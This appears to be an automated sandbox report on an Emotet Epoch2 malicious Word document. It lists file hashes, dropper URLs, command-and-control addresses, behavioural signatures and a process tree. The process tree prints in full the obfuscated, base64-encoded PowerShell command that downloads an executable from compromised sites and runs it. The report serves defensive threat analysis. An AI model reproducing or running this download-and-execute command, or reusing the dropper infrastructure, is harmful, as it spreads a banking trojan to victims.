emotet | 21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac

General

Target

emotet_e2_21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac_2020-10-28__174250968356._doc.doc
Size

218KB
MD5

8d7f667c5911d8e6c24bcbdbfe56b497
SHA1

e13f9c603441f701c0ca9a53bb9b69eb5cb071a9
SHA256

21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac
SHA512

cc60e5138a4f1ff38329f30507a2840550758ca1bc0469f9c347ed735eb55b9af8ae69eb0dd646d4a22189e38812a6b386d66c7df3a25d3d770297556993b9e0

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://www.saintmarcel.com/wp-includes/VKbL2/

exe.dropper

https://gayatrienterprise.org/wp-admin/DPBsj/

exe.dropper

https://weparditestaa.fi/wp-admin/72uPk/

exe.dropper

https://blog.6b47.com/Assets/w5U/

exe.dropper

https://www.easeiseasy.com/wp-admin/q/

exe.dropper

https://ursuperstar.com/wp-admin/AAxKlbV/

exe.dropper

https://kramedas.lt/wp-admin/E9Gciyc/

exe.dropper

https://critical-thinking.fr/wp-includes/vHQWren/

Extracted

Family

emotet

Botnet

Epoch2

C2

80.227.52.78:80

51.89.199.141:8080

173.212.214.235:7080

167.114.153.111:8080

61.19.246.238:443

37.179.204.33:80

190.164.104.62:80

95.9.5.93:80

138.68.87.218:443

176.111.60.55:8080

194.190.67.75:80

66.76.12.94:8080

190.29.166.0:80

139.59.60.244:8080

184.180.181.202:80

49.50.209.131:80

24.133.106.23:80

121.7.31.214:80

185.94.252.104:443

50.91.114.38:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	1960	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/3176-11-0x00000000022F0000-0x0000000002333000-memory.dmp	emotet
behavioral1/memory/3176-12-0x0000000002340000-0x0000000002382000-memory.dmp	emotet
behavioral1/memory/1912-15-0x00000000021C0000-0x0000000002203000-memory.dmp	emotet
behavioral1/memory/1912-16-0x0000000002210000-0x0000000002252000-memory.dmp	emotet

Blacklisted process makes network request 2 IoCs

Processes:

POwersheLL.exe

flow pid process

15 2940 POwersheLL.exe
17 2940 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

R1s2f0emk.exenetbtugc.exe

pid process

3176 R1s2f0emk.exe
1912 netbtugc.exe
Drops file in System32 directory 1 IoCs

Processes:

R1s2f0emk.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\wlanutil\netbtugc.exe R1s2f0emk.exe

flow	pid	process
15	2940	POwersheLL.exe
17	2940	POwersheLL.exe

pid	process
3176	R1s2f0emk.exe
1912	netbtugc.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\wlanutil\netbtugc.exe	R1s2f0emk.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

968 WINWORD.EXE
968 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

POwersheLL.exenetbtugc.exe

pid process

2940 POwersheLL.exe
2940 POwersheLL.exe
2940 POwersheLL.exe
1912 netbtugc.exe
1912 netbtugc.exe
1912 netbtugc.exe
1912 netbtugc.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 2940 POwersheLL.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXER1s2f0emk.exenetbtugc.exe

pid process

968 WINWORD.EXE
968 WINWORD.EXE
968 WINWORD.EXE
968 WINWORD.EXE
968 WINWORD.EXE
968 WINWORD.EXE
968 WINWORD.EXE
3176 R1s2f0emk.exe
1912 netbtugc.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
968	WINWORD.EXE
968	WINWORD.EXE

pid	process
2940	POwersheLL.exe
2940	POwersheLL.exe
2940	POwersheLL.exe
1912	netbtugc.exe
1912	netbtugc.exe
1912	netbtugc.exe
1912	netbtugc.exe

description	pid	process
Token: SeDebugPrivilege	2940	POwersheLL.exe

pid	process
968	WINWORD.EXE
968	WINWORD.EXE
968	WINWORD.EXE
968	WINWORD.EXE
968	WINWORD.EXE
968	WINWORD.EXE
968	WINWORD.EXE
3176	R1s2f0emk.exe
1912	netbtugc.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

R1s2f0emk.exe

description	pid	process	target process
PID 3176 wrote to memory of 1912	3176	R1s2f0emk.exe	netbtugc.exe
PID 3176 wrote to memory of 1912	3176	R1s2f0emk.exe	netbtugc.exe
PID 3176 wrote to memory of 1912	3176	R1s2f0emk.exe	netbtugc.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac_2020-10-28__174250968356._doc.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD UwBlAHQALQBJAFQARQBNACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBQAFYASgBVACAAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARQBNAC4AJwAsACcAaQBvAC4ARABpAHIAZQAnACwAJwBjAFQAbwByAFkAJwAsACcAUwB5AHMAVAAnACkAKQAgADsAIAAgACQARABUAE4AbQByAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADUAfQAiACAALQBGACcAcwB5AHMAdABlAE0ALgBuAEUAdAAuAFMAZQBSAHYASQBjAGUAJwAsACcAYQBuACcALAAnAFQAbQAnACwAJwBwACcALAAnAG8ASQBuACcALAAnAGEARwBlAFIAJwApACAAOwAgACQAVgB3ADYAMQB2AHAAdQA9ACgAJwBCACcAKwAoACcAMgAnACsAJwBoAHcAOQAnACkAKwAnADIAeAAnACkAOwAkAEUAagAyAHAAMQA1ADIAPQAkAEEAMwBhAHMANwBxAGEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAZAA5AGwAdgB4AG8AOwAkAE8AdQB2AGQAXwBhAG0APQAoACcAVwAnACsAKAAnAGUAMQAnACsAJwBfACcAKQArACgAJwAzACcAKwAnADMAcAAnACkAKQA7ACAAKAAgAGcASQAgACAAVgBhAFIASQBhAGIATABlADoAcAB2AGoAdQAgACkALgBWAEEAbAB1AGUAOgA6ACIAQwBgAFIARQBBAHQAZQBkAGAASQByAGAARQBDAHQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnADcAJwArACcAbwBQAFEAJwApACsAKAAnAHEANQA0ACcAKwAnADEAMAAnACsAJwBvADcAbwBQAFkAcQAnACkAKwAnAHIAdAAnACsAKAAnAGgAdAAxACcAKwAnADcAbwAnACkAKwAnAFAAJwApACAAIAAtAEMAcgBFAFAATABBAGMAZQAoAFsAQwBIAEEAUgBdADUANQArAFsAQwBIAEEAUgBdADEAMQAxACsAWwBDAEgAQQBSAF0AOAAwACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABVADUAcwBxAHQAaABrAD0AKAAoACcAUAAnACsAJwBlAGMAJwApACsAKAAnAHMAcgBqACcAKwAnAGUAJwApACkAOwAgACgAIAAgAEcAZQB0AC0AVgBhAHIASQBhAGIATABlACAARAB0AG4ATQBSACkALgB2AEEATABVAEUAOgA6ACIAcwBlAEMAdQByAGAASQBUAGAAeQBQAFIATwB0AG8AQwBPAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAnACkAKwAnADEAMgAnACkAOwAkAEkAdgBjAG4AZgB1AHoAPQAoACcATAAzACcAKwAnAHgAMwAnACsAKAAnADIAJwArACcAYQAwACcAKQApADsAJABNADMAegB5ADkAMQBqACAAPQAgACgAJwBSADEAJwArACgAJwBzACcAKwAnADIAZgAnACkAKwAnADAAJwArACgAJwBlAG0AJwArACcAawAnACkAKQA7ACQATQA2ADkANgAzAHgAYQA9ACgAKAAnAFEAJwArACcAZwAxACcAKQArACgAJwBiAGQAJwArACcAagAnACkAKwAnAGYAJwApADsAJABaADIAdgB0AHgAdgBnAD0AKAAoACcAVgAyADIAJwArACcAbgAnACkAKwAnAGsAbgAnACsAJwByACcAKQA7ACQAVABqAG0AbwA3AHkAZgA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBsAGUAJwArACcAUQBxADUAJwApACsAKAAnADQAMQAnACsAJwAwACcAKQArACcAbwBSACcAKwAnAGwAZQAnACsAKAAnAFkAcQAnACsAJwByAHQAJwApACsAKAAnAGgAdAAxAFIAJwArACcAbAAnACkAKwAnAGUAJwApAC4AIgBSAEUAUABgAEwAYABBAEMAZQAiACgAKAAnAFIAJwArACcAbABlACcAKQAsAFsAUwBUAHIASQBuAGcAXQBbAEMAaABhAHIAXQA5ADIAKQApACsAJABNADMAegB5ADkAMQBqACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAQwA4AGMANgBkAHcAYQA9ACgAJwBUACcAKwAoACcAcQAnACsAJwBuADMAJwApACsAKAAnAGcAJwArACcAeAB4ACcAKQApADsAJABYADAAMgB2AGIAYwBuAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAEUAdAAuAHcAZQBCAEMATABpAEUATgBUADsAJABBAGQANAAwAGwAOABoAD0AKAAoACgAKAAnAGgAdAB0AHAAcwAnACsAJwA6AF0AWwAgADEAKQAnACsAJwAgACcAKwAnAGoAagBrAGcAJwArACcAUwAgAFsAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAJwArACcAXQAgACcAKwAnAFsAXQB3AHcAdwB3ACcAKwAnAC4AcwBhAGkAbgAnACkAKQArACgAKAAnAHQAbQBhAHIAYwAnACsAJwBlAGwAJwArACcALgBjAG8AbQAnACsAJwBdAFsAIAAnACsAJwAxACcAKwAnACkAIAAnACsAJwBqACcAKwAnAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwB3AHAALQAnACsAJwBpAG4AYwBsAHUAZABlAHMAXQBbACAAMQApACAAJwArACcAagBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcAJwArACcAVgBLAGIATAAyAF0AWwAgADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAJwApACkAKwAoACgAJwBdACAAJwArACcAWwBdACcAKwAnAHcAQABoAHQAJwArACcAdABwAHMAJwArACcAOgBdAFsAJwArACcAIAAxACcAKwAnACkAJwArACcAIABqAGoAJwArACcAawBnAFMAIABbAF0AJwArACcAIABbACcAKwAnAF0AdwBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAawBnAFMAIABbAF0AIAAnACsAJwBbAF0AJwArACcAdwBnAGEAeQBhAHQAcgBpAGUAbgB0AGUAcgBwAHIAJwApACkAKwAoACgAJwBpAHMAZQAuAG8AJwArACcAcgBnAF0AWwAgADEAKQAgAGoAJwArACcAagAnACsAJwBrACcAKQApACsAKAAoACcAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwAnACsAJwBdAHcAdwBwACcAKwAnAC0AYQBkAG0AaQBuAF0AWwAgADEAKQAgACcAKwAnAGoAagBrAGcAUwAgACcAKwAnAFsAXQAgAFsAXQB3AEQAUABCAHMAJwArACcAagBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAJwApACkAKwAoACcAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwBAAGgAdAAnACkAKwAoACgAJwB0AHAAcwAnACsAJwA6ACcAKwAnAF0AWwAnACsAJwAgACcAKwAnADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAXQAgAFsAXQAnACsAJwB3AF0AWwAnACsAJwAgACcAKQApACsAKAAoACcAMQApACAAJwArACcAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAdwBlAHAAJwArACcAYQAnACsAJwByAGQAJwArACcAaQB0AGUAJwArACcAcwAnACsAJwB0AGEAYQAuAGYAaQBdAFsAIAAxACcAKwAnACkAIAAnACsAJwBqAGoAawBnAFMAIABbAF0AJwArACcAIABbAF0AdwAnACkAKQArACgAKAAnAHcAJwArACcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAbgAnACsAJwBdACcAKwAnAFsAIAAnACsAJwAxACcAKwAnACkAIABqAGoAJwArACcAawBnAFMAIABbAF0AIABbAF0AdwA3ADIAdQAnACkAKQArACgAKAAnAFAAawBdAFsAIAAxACcAKwAnACkAJwArACcAIAAnACsAJwBqAGoAawBnAFMAJwArACcAIABbACcAKwAnAF0AIAAnACsAJwBbAF0AdwBAACcAKwAnAGgAdAB0AHAAcwAnACsAJwA6AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwApACkAKwAoACcAagAnACsAJwBrAGcAUwAgACcAKQArACgAKAAnAFsAJwArACcAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAJwArACcAUwAnACsAJwAgAFsAXQAgAFsAXQB3AGIAbABvACcAKwAnAGcALgA2AGIANAA3ACcAKwAnAC4AYwBvAG0AXQBbACAAJwArACcAMQApACcAKQApACsAKAAnACAAagBqAGsAJwArACcAZwBTACAAJwArACcAWwBdACAAWwAnACsAJwBdAHcAQQBzAHMAZQB0AHMAXQBbACcAKQArACgAKAAnACAAMQApACAAJwArACcAagBqACcAKwAnAGsAJwArACcAZwAnACsAJwBTACAAWwBdACAAWwBdAHcAdwA1AFUAXQBbACcAKwAnACAAMQAnACsAJwApACAAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAWwAnACsAJwBdACcAKQApACsAKAAnACAAJwArACcAWwBdAHcAQAAnACkAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAoACgAJwBzACcAKwAnADoAXQAnACsAJwBbACAAMQApACAAagBqACcAKwAnAGsAZwBTACAAWwBdACAAJwArACcAWwBdAHcAXQBbACAAMQApACAAJwArACcAagBqACcAKwAnAGsAZwBTACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdwB3AHcALgBlAGEAcwBlAGkAcwBlACcAKQApACsAKAAoACcAYQAnACsAJwBzAHkAJwArACcALgBjAG8AbQBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIAAnACsAJwBbACcAKwAnAF0AJwArACcAIABbACcAKwAnAF0AdwB3ACcAKwAnAHAAJwApACkAKwAoACgAJwAtAGEAZABtAGkAbgBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBxAF0AJwArACcAWwAnACsAJwAgACcAKwAnADEAKQAgACcAKwAnAGoAJwArACcAagAnACsAJwBrAGcAJwArACcAUwAnACsAJwAgACcAKwAnAFsAXQAgACcAKwAnAFsAXQB3AEAAJwArACcAaAB0ACcAKwAnAHQAJwArACcAcABzACcAKwAnADoAJwArACcAXQBbACAAMQApACcAKwAnACAAJwArACcAagAnACsAJwBqAGsAZwBTACAAJwArACcAWwBdACAAWwBdAHcAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdQByACcAKwAnAHMAdQBwAGUAcgBzACcAKwAnAHQAYQByAC4AJwArACcAYwAnACkAKQArACgAKAAnAG8AbQBdAFsAJwArACcAIAAxACkAIAAnACsAJwBqAGoAawAnACkAKQArACgAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB3AHAALQBhACcAKwAnAGQAbQAnACsAJwBpAG4AXQBbACAAMQApACAAagAnACsAJwBqACcAKwAnAGsAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAQQBBAHgAJwArACcASwBsAGIAVgBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAIAAnACsAJwBbAF0AIAAnACsAJwBbAF0AdwBAAGgAJwArACcAdAB0AHAAcwA6AF0AWwAgADEAJwArACcAKQAnACsAJwAgAGoAagBrAGcAUwAgACcAKQApACsAKAAoACcAWwAnACsAJwBdACAAWwBdAHcAXQBbACAAMQApACAAagBqAGsAZwAnACsAJwBTACcAKwAnACAAWwBdACcAKwAnACAAWwBdACcAKQApACsAKAAoACcAdwBrAHIAYQBtACcAKwAnAGUAZABhAHMALgBsAHQAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAJwArACcAWwAnACsAJwBdACAAJwArACcAWwBdAHcAdwBwAC0AJwApACkAKwAoACgAJwBhAGQAbQBpAG4AXQBbACcAKwAnACAAMQApACAAagAnACsAJwBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcARQAnACsAJwA5ACcAKwAnAEcAYwAnACsAJwBpAHkAYwBdAFsAIAAxACkAIABqAGoAawAnACsAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwBAAGgAdAB0AHAAcwA6AF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAUwAgACcAKwAnAFsAXQAgAFsAJwArACcAXQB3AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwArACcAagBrACcAKwAnAGcAUwAgAFsAXQAgAFsAXQB3ACcAKwAnAGMAcgBpACcAKQApACsAKAAnAHQAaQBjAGEAbAAtAHQAaAAnACsAJwBpAG4AawBpACcAKwAnAG4AJwArACcAZwAuACcAKQArACgAKAAnAGYAJwArACcAcgAnACsAJwBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwB3ACcAKwAnAHAALQAnACkAKQArACcAaQAnACsAKAAoACcAbgBjAGwAdQBkAGUAcwBdAFsAIAAnACsAJwAxACkAJwArACcAIAAnACkAKQArACgAJwBqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB2AEgAJwArACcAUQAnACsAJwBXAHIAZQBuAF0AWwAgADEAKQAgAGoAagBrAGcAUwAgACcAKwAnAFsAJwArACcAXQAgAFsAXQB3ACcAKQApACkAKQAuACIAUgBFAGAAUABMAEEAYABDAGUAIgAoACgAKAAoACcAXQBbACAAJwArACcAMQAnACkAKwAoACgAJwApACAAJwApACkAKwAoACcAagBqAGsAJwArACcAZwBTACcAKwAnACAAWwBdACAAWwAnACsAJwBdACcAKQArACcAdwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAAnACsAJwB3AGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABJAHQAIgAoACQAUAB5ADAAbgAzADMAdgAgACsAIAAkAEUAagAyAHAAMQA1ADIAIAArACAAJABSADIAYgBhADcAeABhACkAOwAkAFMAXwA5AGcAaABsAG4APQAoACgAJwBUACcAKwAnAHYAMgBoACcAKQArACcAaAAnACsAJwBvAGEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGMAbgB1ADMAYQBsACAAaQBuACAAJABBAGQANAAwAGwAOABoACkAewB0AHIAeQB7ACQAWAAwADIAdgBiAGMAbgAuACIARABPAHcAbgBMAE8AYQBEAGAARgBgAGkAbABlACIAKAAkAFgAYwBuAHUAMwBhAGwALAAgACQAVABqAG0AbwA3AHkAZgApADsAJABDAHMAMgB4AG8AZQAwAD0AKAAoACcASQBmAGYAbgAnACsAJwB1ACcAKQArACcAXwBkACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAGoAbQBvADcAeQBmACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIANAA0ADMAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAaQAnACsAJwBuADMAJwApACsAKAAnADIAJwArACcAXwBQACcAKQArACcAcgBvACcAKwAoACcAYwBlACcAKwAnAHMAcwAnACkAKQApAC4AIgBjAFIAZQBhAGAAVABFACIAKAAkAFQAagBtAG8ANwB5AGYAKQA7ACQAQwBjAGcAegByAGIAbAA9ACgAKAAnAE8AJwArACcAdwBnAGEAbwAxACcAKQArACcAawAnACkAOwBiAHIAZQBhAGsAOwAkAFYAOQBvADcAbwA3AHcAPQAoACgAJwBQADYAJwArACcAYwBmAGEAJwApACsAJwA1ADMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABRADMAZQBsADYAcwB4AD0AKAAnAEwAbQAnACsAJwA1AHMAJwArACgAJwAzACcAKwAnAG0AOQAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3176

C:\Windows\SysWOW64\wlanutil\netbtugc.exe
"C:\Windows\SysWOW64\wlanutil\netbtugc.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1912

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
1⤵
PID:2080

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
1⤵
PID:3868

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
1⤵
- Modifies data under HKEY_USERS
PID:1044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
517b184a3085056464d9a04dfd3d0703

SHA1
41fb7064c0b6626be4686b2a66fa8f7045f92602

SHA256
5fe16be3e44dd4f75b6dd1eac6f07ce9cfa8dc8f076803bd38b3603f0fa3abb8

SHA512
f41be27a2087f99a8c44d4840e7ae7bb1557ba8a0a6ffadec0a98c545f0ce296534c384e5248923d26ce1dec5d12acafb80d1d2004c84a2f5dc6f800365e0699

Download Submit
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
517b184a3085056464d9a04dfd3d0703

SHA1
41fb7064c0b6626be4686b2a66fa8f7045f92602

SHA256
5fe16be3e44dd4f75b6dd1eac6f07ce9cfa8dc8f076803bd38b3603f0fa3abb8

SHA512
f41be27a2087f99a8c44d4840e7ae7bb1557ba8a0a6ffadec0a98c545f0ce296534c384e5248923d26ce1dec5d12acafb80d1d2004c84a2f5dc6f800365e0699

Download Submit
C:\Windows\SysWOW64\wlanutil\netbtugc.exe
MD5
517b184a3085056464d9a04dfd3d0703

SHA1
41fb7064c0b6626be4686b2a66fa8f7045f92602

SHA256
5fe16be3e44dd4f75b6dd1eac6f07ce9cfa8dc8f076803bd38b3603f0fa3abb8

SHA512
f41be27a2087f99a8c44d4840e7ae7bb1557ba8a0a6ffadec0a98c545f0ce296534c384e5248923d26ce1dec5d12acafb80d1d2004c84a2f5dc6f800365e0699

Download Submit
memory/968-4-0x000001D2A4FAB000-0x000001D2A4FB0000-memory.dmp

Filesize
20KB

Download
memory/968-0-0x00007FFDFD2B0000-0x00007FFDFD8E7000-memory.dmp

Filesize
6.2MB

Download
memory/1912-13-0x0000000000000000-mapping.dmp

Download
memory/1912-15-0x00000000021C0000-0x0000000002203000-memory.dmp

Filesize
268KB

Download
memory/1912-16-0x0000000002210000-0x0000000002252000-memory.dmp

Filesize
264KB

Download
memory/2940-8-0x000001F02DDF0000-0x000001F02DDF1000-memory.dmp

Filesize
4KB

Download
memory/2940-7-0x000001F02D8E0000-0x000001F02D8E1000-memory.dmp

Filesize
4KB

Download
memory/2940-6-0x00007FFDF1740000-0x00007FFDF212C000-memory.dmp

Filesize
9.9MB

Download
memory/3176-11-0x00000000022F0000-0x0000000002333000-memory.dmp

Filesize
268KB

Download
memory/3176-12-0x0000000002340000-0x0000000002382000-memory.dmp

Filesize
264KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads